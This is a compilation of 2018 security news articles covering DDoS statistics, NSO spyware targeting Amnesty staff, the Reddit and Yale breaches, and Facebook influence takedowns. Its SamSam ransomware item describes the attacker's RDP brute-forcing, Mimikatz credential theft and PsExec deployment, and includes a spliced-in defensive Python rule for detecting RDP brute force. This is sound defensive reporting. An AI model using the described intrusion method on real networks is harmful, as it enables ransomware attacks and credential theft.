The latest quarter threw up a number of surprises. The leader by number of attacks is still China, with its share practically unchanged (59.03% against 59.42% in Q1). However, for the first time since monitoring began, Hong Kong broke into the Top 3, rising from fourth to second: its share increased almost fivefold, from 3.67% to 17.13%, squeezing out the US (12.46%) and South Korea (3.21%), whose shares declined by roughly 5 p.p. each.

Another surprise package in the territorial ranking was Malaysia, which shot up to fifth place, now accounting for 1.30% of all DDoS attacks. It was joined in the Top 10 by Australia (1.17%) and Vietnam (0.50%), while the big-hitters Japan, Germany, and Russia all dropped out. Britain (0.50%) and Canada (0.69%) moved into eighth and seventh, respectively.

The Top 10 in Q2 also had a greater share of the total number of attacks than in Q1: 96.44% compared with 95.44%.

Distribution of DDoS attacks by country, Q1 and Q2 2018

The territorial distribution of unique targets roughly corresponds to the distribution of the number of attacks: China has the largest share (52.36%), a rise of 5 p.p. against the previous quarter. Second place belongs to the US (17.5%) and third to Hong Kong (12.88%), up from fourth, replacing South Korea (4.76%) (note that in Hong Kong the most popular targets are now Microsoft Azure servers). Britain fell from fourth to eighth, now accounting for 0.8% of unique targets.

The Top 10 said goodbye to Japan and Germany, but welcomed Malaysia (2.27%) in fourth place and Australia (1.93%) just behind in fifth. This quarter’s Top 10 accounted for slightly more of the total number of unique attacks, reaching 95.09% against 94.17% in Q1.

Distribution of unique DDoS-attack targets by country, Q1 and Q2 2018

Dynamics of the number of DDoS attacks
Peak activity in Q2 2018 was observed in mid-April: a significant increase in the number of attacks was registered in the middle third of this month, with two large spikes occurring just days apart: April 11 (1163) and April 15 (1555). The quarter’s deepest troughs came in the second half and at the end: the calmest days were May 24 (13) and June 17 (16).

Dynamics of the number of DDoS attacks, Q2 2018

In Q2 2018, Sunday went from being the quietest day for cybercriminals to the second most active: it accounted for 14.99% of attacks, up from 10.77% in the previous quarter. But gold in terms of number of attacks went to Tuesday, which braved 17.49% of them. Thursday, meanwhile, went in the opposite direction: only 12.75% of attacks were logged on this day. Overall, as can be seen from the graph, in the period April-June the attack distribution over the days of the week was more even than at the beginning of the year.

Distribution of DDoS attacks by day of the week, Q1 and Q2 2018

Duration and types of DDoS attacks
The longest attack in Q2 lasted 258 hours (almost 11 days), slightly short of the previous quarter’s record of 297 hours (12.4 days). This time, the focus of persevering hackers was an IP address belonging to China Telecom.

Overall, the share of long-duration attacks fell by 0.02 p.p. to 0.12%. Whereas the share of attacks lasting from 100 to 139 hours remained the same, the share of attacks from 10 to 50 hours almost doubled (from 8.28% to 16.27%); meanwhile, the share of attacks lasting from five to nine hours increased by nearly half (from 10.73% to 14.01%). The share of short-duration attacks (up to four hours) fell sharply from 80.73% in January to 69.49% in March.

Distribution of DDoS attacks by duration (hours), Q1 and Q2 2018

SYN flooding aside, all other types of attacks decreased in share; UDP attacks are in second place (10.6%), while TCP, HTTP, and ICMP constitute a relatively small proportion.

Distribution of DDoS attacks by type, Q2 2018

Correlation between Windows- and Linux-based botnet attacks, Q2 2018

Geographical distribution of botnets
The Top 10 regions by number of botnet C&C servers underwent some significant changes. Top spot went to the US with almost half of all C&C centers (44.75% against 29.32% in Q1). South Korea (11.05%) sank from first to second, losing nearly 20 p.p. China also dropped significantly (from 8.0% to 5.52%). Its place was taken by Italy, whose share climbed from 6.83% in the previous quarter to 8.84%. The Top 10 saw the departure of Hong Kong, but was joined—for the first time since our records began—by Vietnam, whose 3.31% was good enough for seventh place.

Distribution of botnet C&C servers by country, Q2 2018

In Q2 2018, cybercriminals continued the above-outlined trend of searching for exotic holes in UDP transport protocols. It surely won’t be long before we hear about other sophisticated methods of attack amplification.

Another technical discovery of note is the potential for creating botnets using the UPnP protocol; although evidence for them exists, they are still extremely rare in the wild, fortunately.

Windows botnet activity decreased: in particular, Yoyo activity experienced a multifold drop, and Nitol, Drive, and Skill also declined. Meanwhile, Xor for Linux significantly increased its number of attacks, while another infamous Linux botnet, Darkai, scaled back slightly. As a result, the most popular type of attack was SYN flooding.

The total attack duration changed little since the previous quarter, but the share of medium-duration attacks increased, while the share of shorter ones decreased. The intensity of attacks also continues to grow. The most lucrative targets for cybercriminals seem to be cryptocurrencies, but we can soon expect to see high-profile attacks against e-sports tournaments as well as relatively small ransoms targeting individual streamers and players. Accordingly, there will be market demand for affordable individual anti-DDoS protection.

Amnesty International employee targeted with NSO group surveillance malware
2.8.2018 securityweek 

An employee at Amnesty International has been targeted with Israeli surveillance malware, the news was revealed by the human rights group.
Amnesty International revealed that one of its employees was targeted with a surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. The hacker attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

This SMS message translates to:

“Court order #XXXXXX issued against identity owner **** on XX/XX/XXX”

The organization added that such attacks are becoming more frequent, with Israeli surveillance software increasingly being used to spy on human rights defenders and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

“In June 2018, an Amnesty International staff member received a malicious WhatsApp message with Saudi Arabia-related bait content and carrying links Amnesty International believes are used to distribute and deploy sophisticated mobile spyware. Through the course of our subsequent investigation we discovered that a Saudi activist based abroad had also received similar malicious messages.” reads the report published by Amnesty International.

“In its analysis of these messages, Amnesty International found connections with a network of over 600 domain names. Not only are these domain names suspicious, but they also overlap with infrastructure that had previously been identified as part of Pegasus, a sophisticated commercial exploitation and spyware platform sold by the Israel surveillance vendor, NSO Group.”

The servers identified by the experts matched NSO Group’s description of Pegasus in the leaked Hacking Team documents, and the researchers found two other connections to NSO Group:

evidence connecting the malicious links used by the attackers to NSO Group network infrastructure that was previously detailed by researchers at Citizen Lab.
a domain registration pattern showing that most of the domains in the NSO Group infrastructure were registered during Israeli working days and hours.
“With the technique we developed, we were then able to identify over 600 servers that demonstrated similar behavior. Among these we found servers that hosted domain names that have been previously identified as connected to NSO Group by Citizen Lab and others, specifically banca-movil[.]com, pine-sales[.]com, and ecommerce-ads[.]org.” continues the report.

Several companies develop surveillance platforms for targeting mobile devices. The NSO Group operated in the dark for several years, until researchers from the Citizen Lab organization and the Lookout firm spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International were corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

“Amnesty International shared the suspicious messages with us and asked us to verify their findings, as we have been tracking infrastructure that appears to be related to NSO Group’s Pegasus spyware since March 2016.” reads the analysis published by Citizen Lab.

“Based on our analysis of the messages sent to these individuals, we can corroborate Amnesty’s findings that the SMS messages contain domain names pointing to websites that appear to be part of NSO Group’s Pegasus infrastructure.”

Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

Country        Targets     Source                   Year
Panama         Up to 150   Univision (1)            2012-2014
UAE            1           Citizen Lab              2016
Mexico         22          Citizen Lab              2016
Saudi Arabia   2           Amnesty, Citizen Lab     2018

Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the recent discovery demonstrates that the trade in surveillance software is getting out of control.

“This is a huge market that’s completely opaque and under-regulated,” he concluded.

Hundreds of apps removed from Google Play store because they were carrying Windows malware
2.8.2018 securityweek Android

Google recently removed 145 applications from the official Google Play store because they were found to carry malicious Windows executables inside.
Researchers from Palo Alto Networks revealed that Google removed more than 145 apps from the Play store because they were carrying Windows malware.

The apps were uploaded to the Google Play store between October and November 2017, which means that for months Android users were exposed to the attack. In some cases, the apps had been downloaded thousands of times and were rated with four stars.

The malicious code included in the apps was developed to compromise Windows systems, leveraging the Android app package as a distribution vector.

“Notably, the infected APK files do not pose any threat to Android devices, as these embedded Windows executable binaries can only run on Windows systems: they are inert and ineffective on the Android platform.” reads the analysis published by Palo Alto networks.

“The fact that these APK files are infected indicates that the developers are creating the software on compromised Windows systems that are infected with malware. This type of infection is a threat to the software supply chain, as compromising software developers has proven to be an effective tactic for wide scale attacks.”

Palo Alto Networks reported that the malicious PE files when executed on a Windows system will perform these suspicious activities:

Creates executable and hidden files in Windows system folders, including copying itself
Changes the Windows registry to auto-start itself after a restart
Attempts to sleep for a long period
Has suspicious network connection activity to an IP address via port 8829
Some of the apps included multiple malicious PE files at different locations and with different file names; still, the experts noticed that the same malware was embedded in most of the applications.

The researchers discovered that one malware sample was included in 142 APKs, and a second malicious file was found in 21 APKs. 15 apps were found to contain both PE files.

In one case, the malicious PE file that was included in the APK of most of the Android apps was a keylogger.

“After investigating all those malicious PE files, we found that there is one PE file which infects most of the Android apps, and the malicious activity of that PE file is key logging.” continues the analysis.

“On a Windows system, this key logger attempts to log keystrokes, which can include sensitive information like credit card numbers, social security numbers and passwords.”

The attackers attempted to conceal the PE files by using fake names that look legitimate, such as Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

The researchers discovered that not all the apps uploaded by the same developers were infected with the malicious files, likely because the developers were using different development platforms for the apps.

“The malicious PE files cannot directly run on the Android hosts. However, if the APK file is unpacked on a Windows machine and the PE files are accidentally executed, or the developers also issue Windows-based software, or if the developers are infected with malicious files runnable on Android platforms, the situation will go much worse.” concludes Palo Alto Networks.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain.”

Facebook reported and blocked attempts to influence campaign ahead of midterm US elections
2.8.2018 securityweek 

Facebook removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the midterm US elections
Facebook has removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the forthcoming midterm US elections.

Facebook is shutting down content and accounts “engaged in coordinated inauthentic behavior”

At this time there is no evidence that confirms the involvement of Russia, but intelligence experts suspect that Russian APT groups were behind the operation.

Facebook founder Mark Zuckerberg announced his response to the recently disclosed abuses.

“One of my top priorities for 2018 is to prevent misuse of Facebook,” Zuckerberg said on his own Facebook page.

“We build services to bring people closer together and I want to ensure we’re doing everything we can to prevent anyone from misusing them to drive us apart.”

According to Facebook, “some of the activity is consistent” with Tactics, Techniques and Procedures (TTPs) associated with the Internet Research Agency that is known as the Russian troll farm that was behind the misinformation campaign aimed at the 2016 Presidential election.

“But we don’t believe the evidence is strong enough at this time to make public attribution to the IRA,” Facebook chief security officer Alex Stamos explained to reporters.

Facebook revealed that some 290,000 users followed at least one of the blocked pages.

“Resisters” enlisted support from real followers for an August protest in Washington against the far-right “Unite the Right” group.

According to Facebook, the fake pages were created more than a year ago; in some cases they were used to promote real-world events, two of which have taken place.

Just after the announcement, the US Government stated that it will not tolerate any interference from foreign states.

“The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation-state or other malicious actors,” deputy press secretary Hogan Gidley told reporters.

The investigation is still ongoing, but the social media giant decided to disclose early findings to shut down the orchestrated misinformation campaign.

Nathaniel Gleicher, Head of Cybersecurity Policy at Facebook, explained that the threat actors used VPNs and internet phone services to protect their anonymity.

“In total, more than 290,000 accounts followed at least one of these Pages, the earliest of which was created in March 2017. The latest was created in May 2018.
The most followed Facebook Pages were “Aztlan Warriors,” “Black Elevation,” “Mindful Being,” and “Resisters.” The remaining Pages had between zero and ten followers, and the Instagram accounts had zero followers.
There were more than 9,500 organic posts created by these accounts on Facebook and one piece of content on Instagram.
They ran about 150 ads for approximately $11,000 on Facebook and Instagram, paid for in US and Canadian dollars. The first ad was created in April 2017, and the last was created in June 2018.
The Pages created about 30 events since May 2017. About half had fewer than 100 accounts interested in attending. The largest had approximately 4,700 accounts interested in attending, and 1,400 users said that they would attend,” said Gleicher.
Facebook announced it would start notifying users who followed the blocked accounts and users who said they would attend events created by one of the suspended accounts or pages.

Facebook reported its findings to US law enforcement agencies, Congress, and other tech companies.

“Today’s disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity,” declared the Senate Intelligence Committee’s top Democrat Mark Warner.

Ten years ago someone breached a Yale University server
2.8.2018 securityweek Incident

Ten years ago someone breached a Yale University server, but because the intrusion happened nearly ten years ago, little is known about how it occurred.
After ten years, Yale University has revealed a security breach that exposed an archive containing the personal information of 119,000 people.

Hackers breached the famous university between April 2008 and January 2009, apparently accessing a server that hosted a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009,” reads the security alert published by Yale University.


The database contained data on individuals affiliated with the university. The unauthorized access was discovered on June 16, 2018, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to determine how the attackers hacked the server, and, according to Yale, “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed. It has sent a notice letter to 97% of the affected people in the Yale community.

There is further disconcerting news for the Yale community: a letter sent by the university to the New Hampshire Attorney General revealed that the same server was hacked a second time, between March 2016 and June 2018.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At the time there is no indication that the exposed data has been misused.

Reddit discloses a data breach, a hacker accessed user data
2.8.2018 securityweek Incident

Reddit Warns Users of Data Breach
Reddit is warning its users of a security breach, an attacker broke into the systems of the platform and accessed user data.
Reddit is warning its users of a security breach, a hacker broke into the systems of the platform and accessed user data.

The hacker accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.

The data breach was discovered on June 19, 2018. According to Reddit, between June 14 and 18, 2018, the attacker compromised some employees’ accounts with the company’s cloud and source code hosting providers.

“A hacker broke into a few of Reddit’s systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords. Since then we’ve been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again,” reads the data breach notification published by the company.

Reddit users who still use the same password they had in 2007 should change it now, along with the password of any other service where they reused the same login credentials.

The hacker did not gain write access to Reddit systems containing backup data, source code, and other logs.

The company explained that the accounts were protected with SMS-based two-factor authentication, which suggests the attackers were able to intercept the authentication codes sent via SMS.

“Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA,” continues Reddit.


The company has taken steps to lock down and rotate all production secrets and API keys, and to enhance its monitoring systems.

Reddit has already reported the security breach to law enforcement and is notifying affected users, urging them to change their passwords.

Let me close with this Q&A published by Reddit:

What information was involved?

Since June 19, we’ve been working with cloud and source code hosting providers to get the best possible understanding of what data the attacker accessed. We want you to know about two key areas of user data that was accessed:

All Reddit data from 2007 and before including account credentials and email addresses
What was accessed: A complete copy of an old database backup containing very early Reddit user data — from the site’s launch in 2005 through May 2007. In Reddit’s first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then.
How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you’re clear here. Check your PMs and/or email inbox: we will be notifying you soon if you’ve been affected.
Email digests sent by Reddit in June 2018
What was accessed: Logs containing the email digests we sent between June 3 and June 17, 2018. The logs contain the digest emails themselves — they look like this. The digests connect a username to the associated email address and contain suggested posts from select popular and safe-for-work subreddits you subscribe to.
How to tell if your information was included: If you don’t have an email address associated with your account or your “email digests” user preference was unchecked during that period, you’re not affected. Otherwise, search your email inbox for emails from [noreply@redditmail.com](mailto:noreply@redditmail.com) between June 3-17, 2018.

Facebook Uncovers Political Influence Campaign Ahead of Midterms
1.8.2018 securityweek 

Facebook said Tuesday it shut down 32 fake pages and accounts involved in an apparent "coordinated" effort to stoke hot-button issues ahead of November midterm US elections, but could not identify the source although Russia is suspected of involvement.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied directly to Russian actors, who American officials say used the platform to spread disinformation ahead of the 2016 US presidential election.

The US intelligence community has concluded that Russia sought to sway the vote in Donald Trump's favor, and Facebook was a primary tool in that effort, using targeted ads to escalate political tensions and push divisive online content.

With the 2018 mid-terms barely three months away, Facebook founder Mark Zuckerberg announced his company's crackdown.

"One of my top priorities for 2018 is to prevent misuse of Facebook," Zuckerberg said on his own Facebook page.

"We build services to bring people closer together and I want to ensure we're doing everything we can to prevent anyone from misusing them to drive us apart."

Trump, now president, has repeatedly downplayed Kremlin efforts to interfere in US democracy.

Two weeks ago, he caused an international firestorm when he stood alongside Russian President Vladimir Putin and cast doubt on assertions that Russia tried to sabotage the vote.

But after Facebook's announcement, the White House stressed Trump opposed all efforts at election interference.

"The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation state or other malicious actors," deputy press secretary Hogan Gidley told reporters.

Facebook said "some of the activity is consistent" with that of the Saint Petersburg-based Internet Research Agency -- the Russian troll farm that managed many false Facebook accounts used to influence the 2016 vote.

"But we don't believe the evidence is strong enough at this time to make public attribution to the IRA," Facebook chief security officer Alex Stamos said during a conference call with reporters.

Special Counsel Robert Mueller is heading a sprawling investigation into possible collusion with Russia by Trump's campaign to tip the vote toward the real estate tycoon.

Mueller has indicted the Russian group and 12 Russian hackers connected to the organization.

Facebook said it is shutting down 32 pages and accounts "engaged in coordinated inauthentic behavior," even though it may never be known for certain who was behind the operation.

The tech giant's investigation is at an early stage, but was revealed now because one of the pages being covertly operated was orchestrating a counter-protest to a white nationalism rally in Washington.

The coordinators of a deadly white-supremacist event in Charlottesville last year reportedly have been given a permit to hold a rally near the White House on August 12, the anniversary of the 2017 gathering.

Facebook said it will notify members of the social network who expressed interest in attending the counter-protest.

- US 'not doing' enough -

Facebook has briefed US law enforcement agencies, Congress and other tech companies about its findings.

"Today's disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity," said the Senate Intelligence Committee's top Democrat Mark Warner.

The panel's chairman, Republican Senator Richard Burr, said he was glad to see Facebook take a "much-needed step toward limiting the use of their platform by foreign influence campaigns."

"The goal of these operations is to sow discord, distrust and division," he added. "The Russians want a weak America."

US lawmakers have introduced multiple bills aimed at boosting election security.

While top Senate Democrat Chuck Schumer applauded Facebook's action, he said the Trump administration itself "is not doing close to enough" to protect elections.

Some of the most-followed pages that were shut down included "Resisters" and "Aztlan Warriors."

Facebook said some 290,000 users followed at least one of the pages.

"Resisters" enlisted support from real followers for an August protest in Washington against the far-right "Unite the Right" group.

Inauthentic pages dating back more than a year organized an array of real world events, all but two of which have taken place, according to Facebook.

The news comes just days after Facebook suffered the worst single-day evaporation of market value for any company, after missing revenue forecasts for the second quarter and offering soft growth projections.

Zuckerberg's firm says the slowdown will come in part due to its new approach to privacy and security, which helped experts uncover these so-called "bad actors."

Mimecast Acquires Threat Detection Startup Solebit for $88 Million
1.8.2018 securityweek   IT

Email and data security firm Mimecast (NASDAQ: MIME) announced on Tuesday that it has acquired threat detection firm Solebit for approximately $88 million net of cash acquired.

Founded in 2014 by cybersecurity experts from the Israel Defense Forces (IDF), Solebit announced that it had raised $11 million in Series A funding in March 2018.

Solebit’s technology helps detect and protect against zero-day malware and unknown threats in data files and links to external resources/URLs.

“Security methods like signature-based antivirus and sandbox detonation are too limited when it comes to today’s most advanced threats,” said Peter Bauer, chief executive officer at Mimecast.

“Solebit has developed a differentiated approach that is engineered to preclude the need for signatures and sandboxes,” the company explains. “It is designed to help customers find advanced threats by recognizing when there is malicious code embedded within active content and data files.”

Mimecast says that Solebit’s threat detection tools are already integrated into Mimecast Targeted Threat Protection products.

London, UK-based Mimecast announced earlier this month that it had acquired Bethesda, Md-based security training company Ataata.

“Combined with the recent acquisition of Ataata in the security awareness and training space, and the recently previewed early adopter web security program, Solebit brings another important set of microservices to the Mime|OS platform that all of Mimecast’s unified services are built upon,” the company says.

Research by Mimecast and Vanson Bourne in May 2018 highlighted the extent to which humans are the targeted weakness in cybersecurity. From a pool of 800 IT decision makers and C-level executives, 94% had witnessed untargeted phishing attacks, 92% had witnessed spear-phishing attacks, 87% had witnessed financially-based email impersonation attacks (BEC), and 40% had seen an increase in trusted third-party impersonation attacks.

Founded by Bauer and CTO Neil Murray in 2003, Mimecast went public in late 2015 at $10 per share, raising $78 million in gross proceeds. After the IPO, share value fell as low as $6.20 in January 2016. Since July 2016, however, share price has risen steadily, sitting at $36.37 at the time of writing.

Investors in Solebit include ClearSky Security, MassMutual Ventures and Glilot Capital Partners.

HP Launches Bug Bounty Program for Printers
1.8.2018 securityweek  

HP announced on Tuesday the launch of a bug bounty program for printers. The company is prepared to pay out up to $10,000 for serious vulnerabilities found in its products.

The initiative, which HP calls the industry’s first printer bug bounty program, was launched in partnership with crowdsourced security platform Bugcrowd.

The program is private, which means not everyone can participate. Researchers invited by HP have been instructed to focus on firmware-level vulnerabilities, including remote code execution, cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs.

The rewards range between $500 and $10,000 per flaw, but HP is not disclosing the specific payouts for each type of issue. Researchers can also earn a reward if they report a vulnerability previously discovered by HP itself – the company describes this as a “good faith payment.”

The bug bounty program currently covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

HP told SecurityWeek that currently it’s engaged with 34 researchers. The company says the program covers only endpoint devices – printer-related web domains are out of scope – with a focus on print firmware.

The company plans on expanding the program to its PC line soon, but it currently focuses on printers due to concerns that the technological advancements in this area make these types of devices an attractive target for malicious actors. HP noted that printers can not only provide access to the network that houses them, but they can also expose confidential documents.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP's Chief Technologist of Print Security. “HP is committed to engineering the most secure printers in the world.”

SamSam Ransomware: Patient, Persistent, Competent and Dangerous
1.8.2018 securityweek  

The SamSam ransomware has always been a bit different. Unlike many ransomware infections, its victims are targeted rather than random -- and the attacker establishes a presence on the victim network before beginning the encryption process.

Victims this year include the City of Atlanta, Allscripts, Adams Memorial Hospital, Colorado Department of Transportation and the Mississippi Valley State University. It could seem that SamSam targets health, education and government; but a new and detailed analysis of SamSam from Sophos shows this is not the case -- and its success rate is far higher than previously thought.

"Sophos have discovered that these three sectors account for fewer than half of the total number of organizations we believe have been victims of SamSam, and it's the private sector who have suffered the most (and disclosed the least)."

By following the money and tracking the Bitcoin payment wallets with help from Neutrino (a firm that specializes in tracking cryptocurrency flows), Sophos researchers have estimated that the SamSam attacker has netted more than $5.9 million since version 1 (it is now at version 3) began being used in January 2016. The attacker is currently collecting an average of $300,000 per month. Sophos estimates that about 233 victims have paid a SamSam ransom.

The attacker is thought to be a single person working alone rather than a criminal or nation-state gang. He (or she) is proficient, although not perfect, in the English language, but probably comes from a country where English is not the first language. He does not boast about his exploits and has no known social media presence where linguistic tells within his ransomware might provide clues to his identity. At this point, his identity and nationality are unknown.

Sophos researchers have tracked (PDF) the evolution of SamSam through its three versions. It shows a developer getting ever more proficient in his craft. The basic MO is to select the targets, possibly through publicly available search engines such as Shodan or Censys; to access the network; to elevate privilege and reconnoiter; and then to encrypt everything he can access. The encryption itself is usually done overnight to reduce the chance of detection.

According to the researchers, version 3 usually gains entry by brute-forcing Windows RDP accounts. "While some may find this shocking," say the researchers, "a simple search on Shodan will reveal thousands of IP addresses accessible over port 3389, the default RDP port."

Once access to a domain user account is obtained, the attacker will typically use Mimikatz to harvest the credentials of the first domain admin to log on. This has been known on some occasions to take days, with the attacker simply waiting.

Armed with privileged access, the attacker starts to manually deploy the ransomware. First, he takes control of one of the victim's servers, which he uses as his command center. Then, he scans the network. If he can write a tiny text file to a computer's filesystem (called test.txt), the name of that file is added to a separate file stored on his command server and known as 'alive.txt'. "The attacker later uses this .txt file as a target list," report the researchers.

Deployment from the command server is usually done with the Sysinternals PsExec application, although the attacker has been known to switch to PowerAdmin's PaExec if the former is blocked. Once the attack is initiated, the attacker simply waits for payment.
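The entry technique described above (repeated password guessing against an exposed RDP service, followed eventually by a successful logon) leaves a clear trail in the Windows Security log, and the waiting period the researchers describe is the defender's window. The following is an added example, not Sophos' or the article's code: a sliding-window detection rule run over constructed sample events. Event IDs 4625 (failed logon) and 4624 (successful logon) and logon type 10 (RemoteInteractive, i.e. RDP) are the standard Windows values; the single-line event format, the threshold and window, and the IP addresses (RFC 5737 documentation ranges) are assumptions made for this example.

```python
"""Detect RDP password guessing followed by a successful logon.

Added example (not from the Sophos report or the article).  A
sliding-window rule over constructed Windows Security events: more than
THRESHOLD failed RDP logons (4625, logon type 10) from one source within
WINDOW raises an alert, and a later successful RDP logon (4624) from a
flagged source raises a second, higher-priority one.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events.  The one-line key=value layout is an
# assumption for this example, not a real Windows export format; the
# addresses are RFC 5737 documentation ranges.
SAMPLE_EVENTS = """\
2018-07-19T02:14:05Z EventID=4625 LogonType=10 Account=administrator SourceIP=203.0.113.7
2018-07-19T02:14:06Z EventID=4625 LogonType=10 Account=administrator SourceIP=203.0.113.7
2018-07-19T02:14:08Z EventID=4625 LogonType=10 Account=admin SourceIP=203.0.113.7
2018-07-19T02:14:09Z EventID=4625 LogonType=10 Account=admin SourceIP=203.0.113.7
2018-07-19T02:14:11Z EventID=4625 LogonType=2 Account=admin SourceIP=203.0.113.7
2018-07-19T02:14:12Z EventID=4625 LogonType=10 Account=backup SourceIP=203.0.113.7
2018-07-19T02:14:20Z EventID=4625 LogonType=10 Account=administrator SourceIP=198.51.100.4
2018-07-19T02:14:22Z EventID=4625 LogonType=10 Account=administrator SourceIP=198.51.100.4
2018-07-19T02:14:24Z EventID=4625 LogonType=10 Account=administrator SourceIP=198.51.100.4
2018-07-19T02:14:26Z EventID=4625 LogonType=10 Account=administrator SourceIP=198.51.100.4
2018-07-19T02:20:41Z EventID=4624 LogonType=10 Account=backup SourceIP=203.0.113.7
2018-07-19T02:25:00Z EventID=4625 LogonType=10 Account=administrator SourceIP=198.51.100.4
"""

THRESHOLD = 5                  # failed RDP logons per source (assumed tuning value)
WINDOW = timedelta(minutes=5)  # sliding window (assumed tuning value)


def parse_event(line: str) -> dict:
    """Split one constructed event line into a dict with a parsed timestamp."""
    ts, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_rdp_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return a list of (source_ip, alert_kind, time) tuples in log order."""
    recent_failures = defaultdict(deque)   # source IP -> timestamps of recent 4625/type-10
    flagged = set()
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = parse_event(line)
        if ev.get("LogonType") != "10":     # only RemoteInteractive (RDP) logons matter here
            continue
        ip, t = ev["SourceIP"], ev["time"]
        if ev["EventID"] == "4625":
            q = recent_failures[ip]
            q.append(t)
            while q and t - q[0] > window:  # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "rdp_bruteforce", t))
        elif ev["EventID"] == "4624" and ip in flagged:
            # The pattern Sophos describes: guessing, then a real logon from the same source.
            alerts.append((ip, "bruteforce_then_success", t))
    return alerts


if __name__ == "__main__":
    for ip, kind, when in detect_rdp_bruteforce(SAMPLE_EVENTS.splitlines()):
        print(f"{when.isoformat()} {kind} from {ip}")
```

In the sample, 203.0.113.7 crosses the threshold at 02:14:12 (the type-2 interactive failure in between is ignored) and then logs on successfully at 02:20:41, producing both alerts; 198.51.100.4 never reaches five failures inside any five-minute window, so it stays silent. On a real network the same rule would be fed from the 4625/4624 events of the RDP-exposed hosts, with the threshold tuned to the environment's normal failure rate.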

One key element of SamSam is the extent to which stealth is used -- entirely in keeping with, and supporting, the attacker's low-profile approach to crime. "In version 3 of SamSam," say the researchers, "the general operation of the payload hasn't changed much since version 1, but the attackers have put significant efforts into creating a stealthier version of the malware."

One example of this is the order in which targeted files are encrypted -- anything smaller than 100 MB immediately, and larger files in size order. SQL and MDF files (which are typically large and time-consuming to encrypt) are next; and finally, anything left that is not on an exclusion list. "This carefully curated approach enables the attacker to achieve a greater volume of encrypted files before the attack is spotted and interrupted."

Another example is the consistency with which the attacker deletes the files he uses once the device is encrypted, or if the attack is interrupted.

Payment is made in Bitcoin (BTC), and the attacker offers several initial options. Individual computers can be decrypted on payment of 0.8 BTC (as of July 2018). Full decryption -- regardless of the number of encrypted computers -- costs 7 BTC (around $40,000 at July 2018 exchange rates). Victims have 7 days to make payment; but there is at least one example of the victim being offered the option to reopen the countdown on payment of 0.5 BTC.

The bad news for victims is that there is no known way to recover SamSam encrypted files. The good news, if you can call it such, is that the attacker really does provide decryption, and even offers online support for those who have difficulties.

Sophos urges companies not to pay any ransom, but accepts the difficulties with SamSam. "Instead," say the researchers, "Sophos strongly recommends a comprehensive layered approach to security, to both avoid an initial attack, and enable system recovery through backups." However, they also note, "Securing an environment against a competent, persistent, and patient, human adversary is somewhat different from defending against the more conventional kinds of semi-automated, social engineering-driven threats more commonly seen in enterprise environments. And SamSam's own particularly damaging behavior sets it apart from many other ransomwares."

Mozilla Reinforces Commitment to Distrust Symantec Certificates
1.8.2018 securityweek Security 

